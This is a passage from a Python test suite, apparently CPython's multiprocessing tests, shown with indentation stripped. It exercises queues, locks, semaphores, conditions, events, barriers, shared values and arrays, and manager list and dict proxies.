self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
